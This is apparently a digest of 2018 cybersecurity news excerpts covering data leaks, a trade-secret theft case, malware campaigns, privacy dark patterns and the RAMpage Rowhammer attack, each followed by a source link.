Travel Information Leaked at Thomas Cook Airlines

By: Kacy Zurkus

A bug finder recently discovered that Thomas Cook Airlines had a security vulnerability for years, making it possible for hackers to systematically download hundreds of thousands of passenger flight details and personal data going back as far as 2013.

The issue, rated a medium to high severity level, leaked personal and travel information but is reportedly now fixed, according to a 9 July blog post by Roy Solberg. After booking his vacation, Solberg reportedly received an email from Thomas Cook Airlines with a suspicious link to airshoppen.com.

“I never downloaded a lot of data as I don’t want anyone to question my motives, but I do like to get an idea of the scope of the data leak, so I did a few tests to see if I could see how many bookings this was affecting,” Solberg wrote. In his tests, Solberg found Ving bookings from as far back as 2013, with the most recent one from 2019.

Using only a booking number, it was possible to retrieve all names on the travel booking along with the email address of the person registering the booking. Also included in the data was departure and arrival dates with airport and flight number information. After nearly two weeks of attempting to disclose the vulnerability, Solberg reportedly received little more than frustrating exchanges before never hearing from Thomas Cook Airlines again.

Three days after he went to the press, the vulnerability was reportedly fixed. This vulnerability, known as an Insecure Direct Object Reference (IDOR) is not only a commonly encountered problem on poorly designed web applications, but it’s also easy for an attacker to exploit. The issue raises concerns for both privacy and phishing attacks.

“We take any breach of our customer data extremely seriously. After being alerted to this unauthorized access to our online duty free shopping website in Norway, we closed the loophole and took responsible actions in line with the law,” a Thomas Cook spokesperson wrote in an email.

“Based upon the evidence we have, and the limited volume and nature of the data that was accessed, our assessment is that this was not an incident which is required to be reported to the authorities. For the same reasons we have not contacted the customers affected.

More: https://www.infosecurity-magazine.com/news/travel-information-leaked-at/

Former Apple employee charged with stealing company trade secrets

By: Rick Hurd

SAN JOSE —A former Apple employee has been charged in federal court with stealing trade secrets from the company, authorities said.

The charges against Xiaolang Zhang were filed Monday in the U.S. District Court of Northern California and allege that Zhang, a hardware engineer for Apple, planned to take some of the company’s secrets with him when he took a job with another company.

Federal agents arrested Zhang on Saturday, as he tried to go through security at Mineta San Jose International Airport, authorities said. He had purchased a last-second round-trip ticket to Beijing, China, with a final destination of Hangzhou, China aboard Hainan Airlines, authorities said.

“Apple takes confidentiality and the protection of our intellectual property very seriously,” Apple spokesman Tom Neumayr said in an email. “We’re working with authorities on this matter and will do everything possible to make sure this individual and other individuals involved are held accountable for their actions.”

Zhang, who now claims to be working for XMotors in Mountain View, came to Apple in December 2015 to work as a hardware engineer on a team trying to develop autonomous cars, authorities said. Apple has kept that research and development a closely guarded secret, and authorities said Zhang was granted broad access to confidential internal databases.

According to the criminal complaint, Zhang went on paternity leave in April this year after the birth of his child and informed Apple upon his return that he’d be leaving the company to return to China because his mother was ill. He also told his supervisor that he’d be going to work for XMotors, a Chinese startup company focused on electric automobiles and driverless vehicle technology.

When Zhang turned in his two company-issued iPhones and his laptop, Apple’s tech security team reviewed the history on his devices and found that his download activity increased dramatically and included information from confidential files, authorities said. Zhang generated 581 rows of user activity on April 28 alone; in the previous month, authorities said, he generated 610 rows.

Authorities said Zhang also admitted that he “air-dropped” information from his devices onto his wife’s personal laptop.

More: https://www-mercurynews-com.

THE WORST CYBERSECURITY BREACHES OF 2018 SO FAR

By: Lily Hay Newman

Looking back at the first six months of 2018, there haven’t been as many government leaks and global ransomware attacks as there were by this time last year, but that’s pretty much where the good news ends. Corporate security isn’t getting better fast enough, critical infrastructure security hangs in the balance, and state-backed hackers from around the world are getting bolder and more sophisticated.

Here are the big digital security dramas that have played out so far this year—and it’s only half over.

Russian Grid Hacking

In 2017, security researchers sounded the alarm about Russian hackers infiltrating and probing United States power companies; there was even evidence that the actors had direct access to an American utility’s control systems. Combined with other high-profile Russian hacking from 2017, like the NotPetya ransomware attacks, the grid penetrations were a sobering revelation. It wasn’t until this year, though, that the US government began publicly acknowledging the Russian state’s involvement in these actions. Officials hinted at it for months, before the Trump Administration first publicly attributed the NotPetya malware to Russia in February and then blamed Russia in March for grid hacking. Though these attributions were already widely assumed, the White House’s public acknowledgement is a key step as both the government and private sector grapple with how to respond. And while the state-sponsored hacking field is getting scarier by the day, you can use WIRED’s grid-hacking guide to gauge when you should really freak out.

US Universities

In March, the Department of Justice indicted nine Iranian hackers over an alleged spree of attacks on more than 300 universities in the United States and abroad. The suspects are charged with infiltrating 144 US universities, 176 universities in 21 other countries, 47 private companies, and other targets like the United Nations, the US Federal Energy Regulatory Commission, and the states of Hawaii and Indiana. The DOJ says the hackers stole 31 terabytes of data, estimated to be worth $3 billion in intellectual property. The attacks used carefully crafted spearphishing emails to trick professors and other university affiliates into clicking on malicious links and entering their network login credentials. Of 100,000 accounts hackers targeted, they were able to gain credentials for about 8,000, with 3,768 of those at US institutions. The DOJ says the campaign traces back to a Tehran-based hacker clearinghouse called the Mabna Institute, which was founded around 2013. The organization allegedly managed hackers and had ties to Iran’s Islamic Revolutionary Guard Corps. Tension between Iran and the US often spills into the digital sphere, and the situation has been in a particularly delicate phase recently.

Malware Delivers Cryptor or Miner, Trojan’s Choice

By: Kacy Zurkus

A long-existing Trojan family still functioning today has spawned new malicious samples of malware, which infects its victims with either a cryptor or a miner, according to Kaspersky Lab.

Distributed through spam emails with documents attached, the samples are related to the Trojan-Ransom.Win32.Rakhni family. “After opening the email attachment, the victim is prompted to save the document and enable editing. The victim is expected to double-click on the embedded PDF file. But instead of opening a PDF the victim launches a malicious executable,” researchers wrote.

The Trojan decides which payload should be downloaded onto the victim’s PC at the moment the malicious executable is launched. “The fact that the malware can decide which payload it uses to infect the victim provides yet another example of the opportunistic tactics used by cybercriminals,” said Orkhan Mamedov, malware analyst, Kaspersky Lab.

“They will always try to benefit from their victims: either by directly extorting money (cryptor), by the unauthorized use of user resources for their own needs (miner), or by exploiting the victim in the chain of malware distribution (net-worm).”

Since first discovered in 2013, the malware writers have changed the way their Trojans get keys. Where they were once locally generated, they are now received from the command and control (C&C). They’ve also altered the algorithms used, going from exclusively using a symmetric algorithm and evolving through a commonly used scheme of symmetric and asymmetric.

Analysts have recently discovered 18 symmetric algorithms used simultaneously. The crypto-libraries are also different, as is the distribution method, which has ranged from spam to remote execution. In the recently spotted samples, criminals added a new mining capability feature.

More: https://www.infosecurity-magazine.com/news/malware-delivers-cryptor-or-miner/

For Financial Services, Encryption is Essential – But So Is Performance

By: Aamir Lakhani

The financial services industry is one hit hardest by the heightened expectations of consumers to access information, receive help, and conduct transactions anywhere and at any time via their mobile devices. By 2025, Millennials are expected to generate 46 percent of all U.S. income, and yet over a fifth of them have never written a physical check to pay a bill. Instead, 38 percent use apps and mobile tools to make bill payments, and 71 percent consider their banking relationship to be transactional rather than relationship-driven.

In addition, more than one-quarter (27 percent) of Millennials are completely reliant on a mobile banking app. In fact, they are 1.3 times more likely than Gen-Xers and 2 times more likely than Baby Boomers to rely on a mobile banking app for regular banking activities.

For financial firms, the ability to offer such services represents a competitive advantage, with 75 percent of banks making investments to create and improve a customer-centric digital business model. Aside from benefitting consumers, greater accessibility to data on various devices and applications can also improve employee efficiency, meeting the common request for more open networks.

Personal Data at Greater Risk

This shift to online consumer banking has led to increasing data traffic volumes as more users rely on applications and endpoints to interact with their personal data. Addressing this growing volume of traffic has led many financial institutions to adopt cloud, and increasingly, multi-cloud environments. Which means that personally identifiable information (PII) is now regularly travelling across different network domains.

While this increases the accessibility of data for consumers, thereby making financial services firms more competitive, it also means that their data spans a larger potential attack surface, making it more susceptible to cyberattacks. As these attacks become more sophisticated, leveraging artificial intelligence and automation to more effectively detect and exploit vulnerabilities, financial services firms not only need to engage in digital transformation but to also do so securely – protecting the private data of consumers.

Greater Interest in Encryption

Regulators are taking a close look at financial services firms to ensure they are implementing the security controls necessary to keep user data private. One of the core security features being required by these bodies is encryption. Encryption refers to converting plain text into secure code that can only be deciphered with a decryption key. This ensures that data in motion across the network and the web, as well as data at rest in the cloud or data center, cannot be seen by anyone without the key – even if it is stolen – adding a strong layer of security.

Encryption for financial services firms is being recommended today by several regulatory guidelines, including the Federal Financial Institutions Examination Council (FFIEC) and the new General Data Protection Regulation (GDPR).

More: https://www.csoonline.com/article/3284351/security/for-financial-services-encryption-is-essential-but-so-is-performance.html

Facebook and Google use ‘dark patterns’ around privacy settings, report says

By: BBC NEWS Technology

Facebook, Google and Microsoft push users away from privacy-friendly options on their services in an “unethical” way, according to a report by the Norwegian Consumer Council.

It studied the privacy settings of the firms and found a series of “dark patterns”, including intrusive default settings and misleading wording.

The firms gave users “an illusion of control”, its report suggested.

Both Google and Facebook said user privacy was important to them.

The report – Deceived by Design – was based on user tests which took place in April and May, when all three firms were making changes to their privacy policies to be in compliance with the EU’s General Data Protection Regulation (GDPR).

Illusion

It found examples of

  • privacy-friendly choices being hidden away
  • take-it-or-leave it choices
  • privacy-intrusive defaults with a longer process for users who want privacy-friendly options
  • some privacy settings being obscured
  • pop-ups compelling users to make certain choices, while key information is omitted or downplayed
  • no option to postpone decisions
  • threats of loss of functionality or deletion of the user account if certain settings not chosen

For example, Facebook warns anyone who wishes to disable facial recognition that doing so means that the firm “won’t be able to use this technology if a stranger uses your photo to impersonate you”.

The report concluded that users are often given the illusion of control through their privacy settings, when they are not getting it.

“Facebook gives the user an impression of control over use of third party data to show ads, while it turns out that the control is much more limited than it initially appears,” the report said.

More: https://www-bbc-co-uk.cdn.ampproject.org/c/s/www.bbc.co.uk/news/amp/technology-44642569

Google reportedly allowed outside app developers to read user emails despite privacy promises.

By: Elizabeth Chuck

The tech giant has allowed hundreds of outside software developers to access the inboxes of Gmail users, the Wall Street Journal reported on Monday.

Google — which a year ago vowed to clamp down on Gmail users’ privacy — has reportedly been letting outside app developers scan millions of inboxes, according to a Wall Street Journal examination.

Despite the promise from Google last June to stop scanning Gmail messages for the purpose of selling targeted ads, the tech giant has been allowing hundreds of outside software developers to access inboxes, the Wall Street Journal reported on Monday.

The app developers were reportedly granted access to the inboxes of users who signed up for email-based tools, such as price comparisons or travel-itinerary planners, the Journal said. By opting in to those tools, users were potentially exposing entire Gmail messages, email addresses, and other pieces of information to third parties, it added.

Over 90 percent of endpoint security incidents involve legitimate binaries

By: Brian Jackson

Cybercriminals use a variety of tactics to cloak their activity and that includes using trusted tools, like PowerShell, to retrieve and execute malicious code from remote sources.

A new report from eSentire reveals that 91 percent of endpoint incidents detected in Q1 2018 involved known, legitimate binaries.

“eSentire Threat Intelligence data shows heavy use of legitimate Microsoft binaries, such as PowerShell and mshta.exe, popular tools for downloading and executing malicious code in the initial stages of a malware infection,” says Eldon Sprickerhoff, founder and chief security strategist, eSentire. “PowerShell can also be leveraged by adversaries to reduce their on-disk footprint and evade detective controls by operating in memory and obfuscating command-line parameters.”

The report also shows a dramatic increase in attacks targeting popular consumer-grade routers, like Netgear and Linksys (who between them have over three-quarters of the market) Researchers saw a 539 percent increase from Q4 2017 to Q1 2018. Increased targeting of routers was first observed in late 2017 when the Reaper Botnet gained media attention. Additionally, intrusion attempts across industries grew 36 percent, mostly due to DNS manipulation in consumer-grade routers. These attacks allow attackers to redirect victims to malicious infrastructure to achieve a variety of results, including malware and phishing landing pages.

“The increase in attacks against consumer network devices can be attributed to the perceived value in recruiting devices for attacks against businesses, as opposed to leveraging them as potential network entry-points,” says Sprickerhoff.

Other findings are that phishing rose 39 percent across industries, with DocuSign, Office 365, and OneDrive being the most popular lures. Office 365 showed the highest success rate and popularity for attacks, growing five fold over 2017.

More: https://betanews-com.cdn.ampproject.org/c/s/betanews.com/2018/06/29/security-legitimate-binaries/amp/

The biggest cybersecurity risk to US businesses is employee negligence, study says

By: Carmen Reinicke

Hackers are no match for human error.

Employee negligence is the main cause of data breaches, according to a state of the industry report by Shred-it, an information security company. The report found that 47 percent of business leaders said human error such as accidental loss of a device or document by an employee had caused a data breach at their organization.

Over 1,000 small business owners and C-suite executives in the United States were surveyed online in April for the report.

In 2017, data breaches cost companies an average of $3.6 million globally, according to a separate report from the Ponemon Institute.

For smaller businesses especially, that price tag could wipe out the entire firm. For a company of any size, a data breach can also cheapen a company’s brand and negatively impact their ability to do work, according to Shred-it.

Basic bad habits

Many of the most dangerous offenses by employees are things that they might not even think about as risky behavior. A surprising number of workers surveyed by Shred-it admitted to bad security behavior at work; over 25 percent said that they leave their computer unlocked and unattended.

Even taking notes on paper, or leaving papers out on your desk, can have unintended consequences.

“When you use paper to document notes or meeting minutes it raises the risk of you leaving that information behind,” said Kalsi. A simple mistake can backfire; earlier this year, a Department of Homeland Security employee left sensitive Super Bowl security documents on a plane.

Remote work

Working from Starbucks or even your living room may be nice and convenient, but it could also be opening your company up to a dangerous data breach.

Remote work is increasing. Over half of hiring managers agree that remote work is more common and a third think it is the future of work, according to a report on the future of work from Upwork, a freelancing platform.

Cybersecurity practices have not yet caught up. A majority of executives agree that the risk of a data breach is higher when an employee works remotely, yet few businesses have comprehensive off-site policies in place for those workers. Over half of small business owners said they have no policy for remote workers.

In addition, contractors or external vendors also open up companies to data breaches. The Shred-it survey found that 1 in 4 executives and 1 in 5 small business owners said that an external vendor was the cause of a data breach at their company.

This is because many businesses don’t do a thorough job of managing access when a relationship with an external vendor ends, according to Kalsi.

“There needs to be better governance around these things,” he said.

More: https://www-cnbc-com.cdn.ampproject.org/c/s/www.cnbc.com/amp/2018/06/21/the-biggest-cybersecurity-risk-to-us-businesses-is-employee-negligence-study-says.html

RAMpage attack could give hackers access to personal information stored in your Android phone

By: Alan Friedman

An attack on Android phones that can change what is stored in the Random Access Memory (RAM) inside a handset, can ultimately lead a hacker to gain control of the device. This attack, called RAMpage for obvious reasons, can theoretically grab passwords stored in a password manager, emails, photos, and documents stored on the unit. It is the subject of a research paper released today from three universities in India, Amsterdam and UC Santa Barbara.
RAMpage is an attack based on the Rowhammer bug that takes advantage of the tightly packed circuitry inside a RAM chip. By electrically attacking one part of a RAM chip, memory cells leak and interfere with other memory cells. Keep in mind that this is not necessarily a flaw, but is a “side effect” of RAM. While some leakage between rows of memory cells is normal, and the RAM chip able to recover, a hacker who attacks the same row repeatedly can flip the bits inside the cells, which use a binary system. The flip, from “0” to “1” or from “1” to “0” will alter the data stored in RAM.
RAMpage can be unleashed on Android devices using LPDDR2, LPDDR3 and LPDDR4 RAM. That means that any Android phone produced in 2012 or later is vulnerable. This is obviously a complicated attack, and while Android devices are currently the target at the moment, eventually iOS devices could be in the crosshairs.